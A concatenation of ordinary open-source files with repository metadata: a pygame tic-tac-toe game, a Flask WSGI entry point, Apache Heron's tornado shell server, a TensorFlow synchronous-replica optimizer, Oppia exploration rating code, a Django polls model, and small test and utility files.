"name": "Shell",
"bytes": "5160"
}
],
"symlink_target": ""
}
|
import pygame
from pygame.locals import *
from Model import GameBoard
from Agent import SmartAgent as Agent
import threading
from copy import deepcopy
class GameSpace:
moveStatement = "Move #{0}: enter choice for Player {1}: {2}"
resourcesBase = "resources/"
xChar = resourcesBase+"xChar.png"
oChar = resourcesBase+"oChar.png"
bChar = resourcesBase+"bChar.png"
grid = resourcesBase+"grid.png"
# Initialize the board,number of agents and threads
def __init__(self, board, numAgents):
pygame.init()
self.size = self.width, self.height = 64*3, 64*3
self.black = 0, 0, 0
self.screen = pygame.display.set_mode(self.size)
self.board = board
self.moveNum = 0
self.agent1 = None
self.agent2 = None
if(numAgents >= 1):
self.agent2 = Agent(board)
if(numAgents == 2):
self.agent1 = Agent(board)
self.aiJob = False
self.input = ""
self.aiThread = None
# update the tictactoe visualization screen
def update_screen(self):
self.screen.fill(self.black)
for i in range(3):
for j in range(3):
char = self.board.getSquareCoordinates(i, j)
charSource = ""
if(char=='X'):
charSource = self.xChar
elif(char=='O'):
charSource = self.oChar
else:
charSource = self.bChar
img = pygame.image.load(charSource)
rec = img.get_rect()
rec.top = i*64
rec.left = j*64
self.screen.blit(img, rec)
img = pygame.image.load(self.grid)
rec = img.get_rect()
self.screen.blit(img, rec)
pygame.display.update()
def RunAI(self, agent, board, player):
self.input = agent.getNextMove(player)
self.aiJob = False
# MAIN section of game play
def main(self):
try:
while(self.board.testWin() is '.'):
self.update_screen()
pygame.event.get() #Keeps the screen alive, otherwise it times out
player = (self.moveNum%2) + 1
move = None
# For Player 1
if(player == 1):
if(self.agent1 != None):
if(self.aiJob==False and self.input==""):
self.aiJob=True
self.aiThread = threading.Thread(target=self.RunAI, args=(self.agent1, deepcopy(self.board), 'X'))
self.aiThread.start()
elif(self.aiJob==False):
move = self.input
self.input = ""
print self.moveStatement.format(self.moveNum, player, move)
else:
move = input(self.moveStatement.format(self.moveNum, player, ""))
# For Player 2
else:
if(self.agent2 != None):
if(self.aiJob==False and self.input==""):
self.aiJob=True
self.aiThread = threading.Thread(target=self.RunAI, args=(self.agent2, deepcopy(self.board), 'O'))
self.aiThread.start()
elif(self.aiJob==False):
move = self.input
self.input = ""
print self.moveStatement.format(self.moveNum, player, move)
else:
move = input(self.moveStatement.format(self.moveNum, player, ""))
try:
if(move!=None):
self.board.setSquare(move, 'X' if player==1 else 'O')
self.moveNum = self.moveNum+1
print self.board
except ValueError as e:
print e
self.update_screen();
except KeyboardInterrupt:
if(self.aiThread != None):
self.aiThread.signal = True
print "Kill command received"
print "Waiting for AI thread to terminate"
self.aiThread.join()
|
{
"content_hash": "8f3e7d29b9e5f8d228cd5d541a710288",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 105,
"avg_line_length": 27.30252100840336,
"alnum_prop": 0.6491228070175439,
"repo_name": "Digmaster/TicTacToe",
"id": "f4f946604b5260a94366806b1ce437f61c30230f",
"size": "3249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "GameSpace.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8392"
}
],
"symlink_target": ""
}
|
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
app = create_app()
app.wsgi_app = ProxyFix(app.wsgi_app)
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
{
"content_hash": "554f514cb2bef14ed72aac954a176bb6",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 44,
"avg_line_length": 20.77777777777778,
"alnum_prop": 0.6684491978609626,
"repo_name": "DoubleHYH/my_Blog",
"id": "070d51934a56efe27fdf2eeab2c5a7d491522a01",
"size": "234",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "wsgi_gunicorn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12403"
},
{
"name": "HTML",
"bytes": "11219"
},
{
"name": "JavaScript",
"bytes": "4310"
},
{
"name": "Python",
"bytes": "8829"
}
],
"symlink_target": ""
}
|
''' main.py '''
import logging
import tornado.ioloop
import tornado.web
from tornado.httpclient import AsyncHTTPClient
from tornado.options import define, options, parse_command_line
from heron.shell.src.python import handlers
default_handlers = [
(r"^/jmap/([0-9]+$)", handlers.JmapHandler),
(r"^/histo/([0-9]+$)", handlers.MemoryHistogramHandler),
(r"^/pmap/([0-9]+$)", handlers.PmapHandler),
(r"^/jstack/([0-9]+$)", handlers.JstackHandler),
(r"^/pid/(.*)", handlers.PidHandler),
(r"^/browse/(.*)", handlers.BrowseHandler),
(r"^/file/(.*)", handlers.FileHandler),
(r"^/filedata/(.*)", handlers.FileDataHandler),
(r"^/filestats/(.*)", handlers.FileStatsHandler),
(r"^/download/(.*)", handlers.DownloadHandler),
(r"^/killexecutor", handlers.KillExecutorHandler),
(r"^/health", handlers.HealthHandler),
]
# pylint: disable=dangerous-default-value
def run(url_to_handlers=default_handlers):
define("port", default=9999, help="Runs on the given port", type=int)
define("secret", default='', help="Shared secret for /killexecutor", type=str)
parse_command_line()
logger = logging.getLogger(__file__)
logger.info("Starting Heron Shell")
logger.info("Shared secret for /killexecutor: %s", options.secret)
AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))
app = tornado.web.Application(url_to_handlers)
app.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
run()
|
{
"content_hash": "8699fcd0f7bfea00420bc7b4ee34552b",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 80,
"avg_line_length": 35.523809523809526,
"alnum_prop": 0.6816353887399463,
"repo_name": "huijunwu/heron",
"id": "c476eca56e7eca970688684eacc67998a5ee1db8",
"size": "2343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heron/shell/src/python/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "12383"
},
{
"name": "C++",
"bytes": "1744417"
},
{
"name": "CSS",
"bytes": "69001"
},
{
"name": "Dockerfile",
"bytes": "946"
},
{
"name": "HCL",
"bytes": "5314"
},
{
"name": "HTML",
"bytes": "36787"
},
{
"name": "Java",
"bytes": "5102572"
},
{
"name": "JavaScript",
"bytes": "1170225"
},
{
"name": "M4",
"bytes": "18741"
},
{
"name": "Makefile",
"bytes": "298"
},
{
"name": "Perl",
"bytes": "9298"
},
{
"name": "Python",
"bytes": "1470967"
},
{
"name": "Scala",
"bytes": "134586"
},
{
"name": "Shell",
"bytes": "236062"
},
{
"name": "Smarty",
"bytes": "528"
},
{
"name": "Starlark",
"bytes": "269247"
}
],
"symlink_target": ""
}
|
from . import proputils
class PropertyTestMixin(object):
def setUp(self):
self.C = self.new_class()
def do_test_set_and_delete(self, c):
c.p = 'x'
self.assertEquals('x', c.p)
c.p = 'y'
self.assertEquals('y', c.p)
del c.p
self.assertRaises(AttributeError, getattr, c, 'p')
self.assertRaises(AttributeError, delattr, c, 'p')
def testInitialState_ClassAttributes(self):
self.assertRaises(AttributeError, getattr, self.C.p, 'name')
self.assertRaises(AttributeError, getattr, self.C.p, 'class')
def testInitialState_Get(self):
c = self.C()
self.assertRaises(AttributeError, getattr, c, 'p')
def testInitialState_Set(self):
c = self.C()
self.assertRaises(AttributeError, setattr, c, 'p', 1)
def testInitialState_Delete(self):
c = self.C()
self.assertRaises(AttributeError, delattr, c, 'p')
def testGetSetAndDelete(self):
proputils.config_props(self.C)
c = self.C()
self.assertRaises(AttributeError, getattr, c, 'p')
self.assertRaises(AttributeError, delattr, c, 'p')
self.do_test_set_and_delete(c)
|
{
"content_hash": "1dc9b987415765dcc9aaf93758fa3fc5",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 65,
"avg_line_length": 26.238095238095237,
"alnum_prop": 0.6687840290381125,
"repo_name": "slobberchops/sordid-tools",
"id": "f3e1a1a6c51a727604d4d66870193724da71dcd1",
"size": "1103",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "props/src/sordid/props/prop_testutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "81039"
}
],
"symlink_target": ""
}
|
import datetime
from django.db import models
from django.utils import timezone
# Create your models here.
class Poll(models.Model):
question = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __unicode__(self):
return self.question
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date < now
was_published_recently.admin_order_field = 'pub_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently ?'
class Choice(models.Model):
poll = models.ForeignKey(Poll)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __unicode__(self):
return self.choice_text
|
{
"content_hash": "dcef8054616ec617a960d2dc1f93a6a7",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 70,
"avg_line_length": 28.896551724137932,
"alnum_prop": 0.6837708830548926,
"repo_name": "linzeyang/Django_Tutorial",
"id": "535cdb988b74f50dc68a25681374dcec420cd4c6",
"size": "838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "polls/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "125"
},
{
"name": "Python",
"bytes": "16536"
}
],
"symlink_target": ""
}
|
"""Synchronize replicas for training."""
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import indexed_slices
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import optimizer
from tensorflow.python.training import queue_runner
from tensorflow.python.training import session_manager
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
# Please note that the gradients from replicas are averaged instead of summed
# (as in the old sync_replicas_optimizer) so you need to increase the learning
# rate according to the number of replicas. This change is introduced to be
# consistent with how gradients are aggregated (averaged) within a batch in a
# replica.
@tf_export(v1=["train.SyncReplicasOptimizer"])
class SyncReplicasOptimizer(optimizer.Optimizer):
"""Class to synchronize, aggregate gradients and pass them to the optimizer.
This class is deprecated. For synchronous training, please use [Distribution
Strategies](https://github.com/tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute).
In a typical asynchronous training environment, it's common to have some
stale gradients. For example, with a N-replica asynchronous training,
gradients will be applied to the variables N times independently. Depending
on each replica's training speed, some gradients might be calculated from
copies of the variable from several steps back (N-1 steps on average). This
optimizer avoids stale gradients by collecting gradients from all replicas,
averaging them, then applying them to the variables in one shot, after
which replicas can fetch the new variables and continue.
The following accumulators/queue are created:
* N `gradient accumulators`, one per variable to train. Gradients are pushed
to them and the chief worker will wait until enough gradients are collected
and then average them before applying to variables. The accumulator will
drop all stale gradients (more details in the accumulator op).
* 1 `token` queue where the optimizer pushes the new global_step value after
all variables are updated.
The following local variable is created:
* `sync_rep_local_step`, one per replica. Compared against the global_step in
each accumulator to check for staleness of the gradients.
The optimizer adds nodes to the graph to collect gradients and pause the
trainers until variables are updated.
For the Parameter Server job:
1. An accumulator is created for each variable, and each replica pushes the
gradients into the accumulators instead of directly applying them to the
variables.
2. Each accumulator averages once enough gradients (replicas_to_aggregate)
have been accumulated.
3. Apply the averaged gradients to the variables.
4. Only after all variables have been updated, increment the global step.
5. Only after step 4, pushes `global_step` in the `token_queue`, once for
each worker replica. The workers can now fetch the global step, use it to
update its local_step variable and start the next batch. Please note that
some workers can consume multiple minibatches, while some may not consume
even one. This is because each worker fetches minibatches as long as
a token exists. If one worker is stuck for some reason and does not
consume a token, another worker can use it.
For the replicas:
1. Start a step: fetch variables and compute gradients.
2. Once the gradients have been computed, push them into gradient
accumulators. Each accumulator will check the staleness and drop the stale.
3. After pushing all the gradients, dequeue an updated value of global_step
from the token queue and record that step to its local_step variable. Note
that this is effectively a barrier.
4. Start the next batch.
### Usage
```python
# Create any optimizer to update the variables, say a simple SGD:
opt = GradientDescentOptimizer(learning_rate=0.1)
# Wrap the optimizer with sync_replicas_optimizer with 50 replicas: at each
# step the optimizer collects 50 gradients before applying to variables.
# Note that if you want to have 2 backup replicas, you can change
# total_num_replicas=52 and make sure this number matches how many physical
# replicas you started in your job.
opt = tf.compat.v1.train.SyncReplicasOptimizer(opt, replicas_to_aggregate=50,
total_num_replicas=50)
# Some models have startup_delays to help stabilize the model but when using
# sync_replicas training, set it to 0.
# Now you can call `minimize()` or `compute_gradients()` and
# `apply_gradients()` normally
training_op = opt.minimize(total_loss, global_step=self.global_step)
# You can create the hook which handles initialization and queues.
sync_replicas_hook = opt.make_session_run_hook(is_chief)
```
In the training program, every worker will run the train_op as if not
synchronized.
```python
with training.MonitoredTrainingSession(
master=workers[worker_id].target, is_chief=is_chief,
hooks=[sync_replicas_hook]) as mon_sess:
while not mon_sess.should_stop():
mon_sess.run(training_op)
```
To use SyncReplicasOptimizer with an `Estimator`, you need to send
sync_replicas_hook while calling the fit.
```python
my_estimator = DNNClassifier(..., optimizer=opt)
my_estimator.fit(..., hooks=[sync_replicas_hook])
```
"""
@deprecation.deprecated(
None, "The `SyncReplicaOptimizer` class is deprecated. For synchronous "
"training, please use [Distribution Strategies](https://github.com/"
"tensorflow/tensorflow/tree/master/tensorflow/contrib/distribute).",
warn_once=True)
def __init__(self,
opt,
replicas_to_aggregate,
total_num_replicas=None,
variable_averages=None,
variables_to_average=None,
use_locking=False,
name="sync_replicas"):
"""Construct a sync_replicas optimizer.
Args:
opt: The actual optimizer that will be used to compute and apply the
gradients. Must be one of the Optimizer classes.
replicas_to_aggregate: number of replicas to aggregate for each variable
update.
total_num_replicas: Total number of tasks/workers/replicas, could be
different from replicas_to_aggregate.
If total_num_replicas > replicas_to_aggregate: it is backup_replicas +
replicas_to_aggregate.
If total_num_replicas < replicas_to_aggregate: Replicas compute
multiple batches per update to variables.
variable_averages: Optional `ExponentialMovingAverage` object, used to
maintain moving averages for the variables passed in
`variables_to_average`.
variables_to_average: a list of variables that need to be averaged. Only
needed if variable_averages is passed in.
use_locking: If True use locks for update operation.
name: string. Optional name of the returned operation.
"""
if total_num_replicas is None:
total_num_replicas = replicas_to_aggregate
super(SyncReplicasOptimizer, self).__init__(use_locking, name)
logging.info(
"SyncReplicasV2: replicas_to_aggregate=%s; total_num_replicas=%s",
replicas_to_aggregate, total_num_replicas)
self._opt = opt
self._replicas_to_aggregate = replicas_to_aggregate
self._gradients_applied = False
self._variable_averages = variable_averages
self._variables_to_average = variables_to_average
self._total_num_replicas = total_num_replicas
self._tokens_per_step = max(total_num_replicas, replicas_to_aggregate)
self._global_step = None
self._sync_token_queue = None
# The synchronization op will be executed in a queue runner which should
# only be executed by one of the replicas (usually the chief).
self._chief_queue_runner = None
# Remember which accumulator is on which device to set the initial step in
# the accumulator to be global step. This list contains list of the
# following format: (accumulator, device).
self._accumulator_list = []
def compute_gradients(self, *args, **kwargs):
"""Compute gradients of "loss" for the variables in "var_list".
This simply wraps the compute_gradients() from the real optimizer. The
gradients will be aggregated in the apply_gradients() so that user can
modify the gradients like clipping with per replica global norm if needed.
The global norm with aggregated gradients can be bad as one replica's huge
gradients can hurt the gradients from other replicas.
Args:
*args: Arguments for compute_gradients().
**kwargs: Keyword arguments for compute_gradients().
Returns:
A list of (gradient, variable) pairs.
"""
return self._opt.compute_gradients(*args, **kwargs)
def apply_gradients(self, grads_and_vars, global_step=None, name=None):
"""Apply gradients to variables.
This contains most of the synchronization implementation and also wraps the
apply_gradients() from the real optimizer.
Args:
grads_and_vars: List of (gradient, variable) pairs as returned by
compute_gradients().
global_step: Optional Variable to increment by one after the
variables have been updated.
name: Optional name for the returned operation. Default to the
name passed to the Optimizer constructor.
Returns:
train_op: The op to dequeue a token so the replicas can exit this batch
and start the next one. This is executed by each replica.
Raises:
ValueError: If the grads_and_vars is empty.
ValueError: If global step is not provided, the staleness cannot be
checked.
"""
if not grads_and_vars:
raise ValueError("Must supply at least one variable")
if global_step is None:
raise ValueError("Global step is required to check staleness")
self._global_step = global_step
train_ops = []
aggregated_grad = []
var_list = []
# local_anchor op will be placed on this worker task by default.
local_anchor = control_flow_ops.no_op()
# Colocating local_step variable prevents it being placed on the PS.
distribution_strategy = distribution_strategy_context.get_strategy()
with distribution_strategy.extended.colocate_vars_with(local_anchor):
self._local_step = variable_scope.variable(
initial_value=0,
trainable=False,
collections=[ops.GraphKeys.LOCAL_VARIABLES],
dtype=global_step.dtype.base_dtype,
name="sync_rep_local_step")
self.local_step_init_op = state_ops.assign(self._local_step, global_step)
chief_init_ops = [self.local_step_init_op]
self.ready_for_local_init_op = variables.report_uninitialized_variables(
variables.global_variables())
with ops.name_scope(None, self._name):
for grad, var in grads_and_vars:
var_list.append(var)
with ops.device(var.device):
# Dense gradients.
if grad is None:
aggregated_grad.append(None) # pass-through.
continue
elif isinstance(grad, ops.Tensor):
grad_accum = data_flow_ops.ConditionalAccumulator(
grad.dtype,
shape=var.get_shape(),
shared_name=var.name + "/grad_accum")
train_ops.append(grad_accum.apply_grad(
grad, local_step=self._local_step))
aggregated_grad.append(grad_accum.take_grad(
self._replicas_to_aggregate))
else:
if not isinstance(grad, indexed_slices.IndexedSlices):
raise ValueError("Unknown grad type!")
grad_accum = data_flow_ops.SparseConditionalAccumulator(
grad.dtype, shape=(), shared_name=var.name + "/grad_accum")
train_ops.append(grad_accum.apply_indexed_slices_grad(
grad, local_step=self._local_step))
aggregated_grad.append(grad_accum.take_indexed_slices_grad(
self._replicas_to_aggregate))
self._accumulator_list.append((grad_accum, var.device))
aggregated_grads_and_vars = zip(aggregated_grad, var_list)
# sync_op will be assigned to the same device as the global step.
with ops.device(global_step.device), ops.name_scope(""):
update_op = self._opt.apply_gradients(aggregated_grads_and_vars,
global_step)
# Create token queue.
with ops.device(global_step.device), ops.name_scope(""):
sync_token_queue = (
data_flow_ops.FIFOQueue(-1,
global_step.dtype.base_dtype,
shapes=(),
name="sync_token_q",
shared_name="sync_token_q"))
self._sync_token_queue = sync_token_queue
with ops.device(global_step.device), ops.name_scope(""):
# Replicas have to wait until they can get a token from the token queue.
with ops.control_dependencies(train_ops):
token = sync_token_queue.dequeue()
train_op = state_ops.assign(self._local_step, token)
with ops.control_dependencies([update_op]):
# Sync_op needs to insert tokens to the token queue at the end of the
# step so the replicas can fetch them to start the next step.
tokens = array_ops.fill([self._tokens_per_step], global_step)
sync_op = sync_token_queue.enqueue_many((tokens,))
if self._variable_averages is not None:
with ops.control_dependencies([sync_op]), ops.name_scope(""):
sync_op = self._variable_averages.apply(
self._variables_to_average)
self._chief_queue_runner = queue_runner.QueueRunner(
sync_token_queue, [sync_op])
for accum, dev in self._accumulator_list:
with ops.device(dev):
chief_init_ops.append(
accum.set_global_step(
global_step, name="SetGlobalStep"))
self.chief_init_op = control_flow_ops.group(*(chief_init_ops))
self._gradients_applied = True
return train_op
def get_chief_queue_runner(self):
"""Returns the QueueRunner for the chief to execute.
This includes the operations to synchronize replicas: aggregate gradients,
apply to variables, increment global step, insert tokens to token queue.
Note that this can only be called after calling apply_gradients() which
actually generates this queuerunner.
Returns:
A `QueueRunner` for chief to execute.
Raises:
ValueError: If this is called before apply_gradients().
"""
if self._gradients_applied is False:
raise ValueError("Should be called after apply_gradients().")
return self._chief_queue_runner
def get_slot(self, *args, **kwargs):
"""Return a slot named "name" created for "var" by the Optimizer.
This simply wraps the get_slot() from the actual optimizer.
Args:
*args: Arguments for get_slot().
**kwargs: Keyword arguments for get_slot().
Returns:
The `Variable` for the slot if it was created, `None` otherwise.
"""
return self._opt.get_slot(*args, **kwargs)
def variables(self):
"""Fetches a list of optimizer variables in the default graph.
This wraps `variables()` from the actual optimizer. It does not include
the `SyncReplicasOptimizer`'s local step.
Returns:
A list of variables.
"""
return self._opt.variables()
def get_slot_names(self, *args, **kwargs):
"""Return a list of the names of slots created by the `Optimizer`.
This simply wraps the get_slot_names() from the actual optimizer.
Args:
*args: Arguments for get_slot().
**kwargs: Keyword arguments for get_slot().
Returns:
A list of strings.
"""
return self._opt.get_slot_names(*args, **kwargs)
def get_init_tokens_op(self, num_tokens=-1):
"""Returns the op to fill the sync_token_queue with the tokens.
This is supposed to be executed in the beginning of the chief/sync thread
so that even if the total_num_replicas is less than replicas_to_aggregate,
the model can still proceed as the replicas can compute multiple steps per
variable update. Make sure:
`num_tokens >= replicas_to_aggregate - total_num_replicas`.
Args:
num_tokens: Number of tokens to add to the queue.
Returns:
An op for the chief/sync replica to fill the token queue.
Raises:
ValueError: If this is called before apply_gradients().
ValueError: If num_tokens are smaller than replicas_to_aggregate -
total_num_replicas.
"""
if self._gradients_applied is False:
raise ValueError(
"get_init_tokens_op() should be called after apply_gradients().")
tokens_needed = self._replicas_to_aggregate - self._total_num_replicas
if num_tokens == -1:
num_tokens = self._replicas_to_aggregate
elif num_tokens < tokens_needed:
raise ValueError(
"Too few tokens to finish the first step: %d (given) vs %d (needed)" %
(num_tokens, tokens_needed))
if num_tokens > 0:
with ops.device(self._global_step.device), ops.name_scope(""):
tokens = array_ops.fill([num_tokens], self._global_step)
init_tokens = self._sync_token_queue.enqueue_many((tokens,))
else:
init_tokens = control_flow_ops.no_op(name="no_init_tokens")
return init_tokens
def make_session_run_hook(self, is_chief, num_tokens=-1):
"""Creates a hook to handle SyncReplicasHook ops such as initialization."""
return _SyncReplicasOptimizerHook(self, is_chief, num_tokens)
class _SyncReplicasOptimizerHook(session_run_hook.SessionRunHook):
"""A SessionRunHook handles ops related to SyncReplicasOptimizer."""
def __init__(self, sync_optimizer, is_chief, num_tokens):
"""Creates hook to handle SyncReplicasOptimizer initialization ops.
Args:
sync_optimizer: `SyncReplicasOptimizer` which this hook will initialize.
is_chief: `Bool`, whether is this a chief replica or not.
num_tokens: Number of tokens to add to the queue.
"""
self._sync_optimizer = sync_optimizer
self._is_chief = is_chief
self._num_tokens = num_tokens
def begin(self):
if self._sync_optimizer._gradients_applied is False: # pylint: disable=protected-access
raise ValueError(
"SyncReplicasOptimizer.apply_gradient should be called before using "
"the hook.")
if self._is_chief:
self._local_init_op = self._sync_optimizer.chief_init_op
self._ready_for_local_init_op = (
self._sync_optimizer.ready_for_local_init_op)
self._q_runner = self._sync_optimizer.get_chief_queue_runner()
self._init_tokens_op = self._sync_optimizer.get_init_tokens_op(
self._num_tokens)
else:
self._local_init_op = self._sync_optimizer.local_step_init_op
self._ready_for_local_init_op = (
self._sync_optimizer.ready_for_local_init_op)
self._q_runner = None
self._init_tokens_op = None
def after_create_session(self, session, coord):
"""Runs SyncReplicasOptimizer initialization ops."""
local_init_success, msg = session_manager._ready( # pylint: disable=protected-access
self._ready_for_local_init_op, session,
"Model is not ready for SyncReplicasOptimizer local init.")
if not local_init_success:
raise RuntimeError(
"Init operations did not make model ready for SyncReplicasOptimizer "
"local_init. Init op: %s, error: %s" %
(self._local_init_op.name, msg))
session.run(self._local_init_op)
if self._init_tokens_op is not None:
session.run(self._init_tokens_op)
if self._q_runner is not None:
self._q_runner.create_threads(
session, coord=coord, daemon=True, start=True)
|
{
"content_hash": "9426ab60ec4db7c218237d10d17ab83e",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 98,
"avg_line_length": 42.228865979381446,
"alnum_prop": 0.6862946145207753,
"repo_name": "paolodedios/tensorflow",
"id": "23b5f32b0b147ea74c949a5440c837b96bfb4e6a",
"size": "21171",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/sync_replicas_optimizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1387968"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "125994873"
},
{
"name": "CMake",
"bytes": "182324"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11402294"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300208"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42775737"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621520"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7727119"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
"""System for assigning and displaying ratings of explorations."""
import datetime
from core.domain import event_services
from core.domain import exp_services
from core.platform import models
import feconf
(exp_models, user_models,) = models.Registry.import_models([
models.NAMES.exploration, models.NAMES.user])
transaction_services = models.Registry.import_transaction_services()
ALLOWED_RATINGS = [1, 2, 3, 4, 5]
def assign_rating_to_exploration(user_id, exploration_id, new_rating):
"""Records the rating awarded by the user to the exploration in both the
user-specific data and exploration summary.
It validates the exploration id but not the user id.
- 'new_rating' should be an integer between 1 and 5
"""
if not isinstance(new_rating, int):
raise ValueError(
'Expected the rating to be an integer, received %s' % new_rating)
if new_rating not in ALLOWED_RATINGS:
raise ValueError('Expected a rating 1-5, received %s.' % new_rating)
try:
exp_services.get_exploration_by_id(exploration_id)
except:
raise Exception('Invalid exploration id %s' % exploration_id)
def _update_user_rating():
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
if exp_user_data_model:
old_rating = exp_user_data_model.rating
else:
old_rating = None
exp_user_data_model = user_models.ExplorationUserDataModel.create(
user_id, exploration_id)
exp_user_data_model.rating = new_rating
exp_user_data_model.rated_on = datetime.datetime.utcnow()
exp_user_data_model.put()
return old_rating
old_rating = transaction_services.run_in_transaction(_update_user_rating)
exploration_summary = exp_services.get_exploration_summary_by_id(
exploration_id)
if not exploration_summary.ratings:
exploration_summary.ratings = feconf.get_empty_ratings()
exploration_summary.ratings[str(new_rating)] += 1
if old_rating:
exploration_summary.ratings[str(old_rating)] -= 1
event_services.RateExplorationEventHandler.record(
exploration_id, user_id, new_rating, old_rating)
exploration_summary.scaled_average_rating = (
exp_services.get_scaled_average_rating(
exploration_summary.ratings))
exp_services.save_exploration_summary(exploration_summary)
def get_user_specific_rating_for_exploration(user_id, exploration_id):
"""
Returns:
An integer 1-5, or None if there is no rating of this exploration by
this user.
"""
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
return exp_user_data_model.rating if exp_user_data_model else None
def get_when_exploration_rated(user_id, exploration_id):
"""Returns the date-time the exploration was lasted rated by this user, or
None if no such rating has been awarded.
Currently this function is only used for testing since the times ratings
were awarded are not used for anything.
"""
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
return exp_user_data_model.rated_on if exp_user_data_model else None
def get_overall_ratings_for_exploration(exploration_id):
exp_summary = exp_services.get_exploration_summary_by_id(exploration_id)
return exp_summary.ratings
|
{
"content_hash": "dbbbba217272298b613d5ae7ba3e8d0b",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 78,
"avg_line_length": 36.578947368421055,
"alnum_prop": 0.6975539568345324,
"repo_name": "MaximLich/oppia",
"id": "0bb75814120eac39cac34bf489c86d7a37ce54fc",
"size": "4098",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "core/domain/rating_services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "88445"
},
{
"name": "HTML",
"bytes": "734882"
},
{
"name": "JavaScript",
"bytes": "2302526"
},
{
"name": "Python",
"bytes": "2599422"
},
{
"name": "Shell",
"bytes": "45916"
}
],
"symlink_target": ""
}
|
from .utilities import normalize, cross_val_score, add_intercept
__all__ = ['normalize', 'cross_val_score', 'add_intercept']
|
{
"content_hash": "ba5b2461e43340b613b05edb4cc7dfe4",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 64,
"avg_line_length": 42,
"alnum_prop": 0.7142857142857143,
"repo_name": "bhillmann/koko",
"id": "c4f238ae426d2f6e709a3e5a43c69186ef34f442",
"size": "126",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "koko/utils/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "468147"
},
{
"name": "Python",
"bytes": "6876"
}
],
"symlink_target": ""
}
|
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_crossing02.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [43812352, 43814272]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
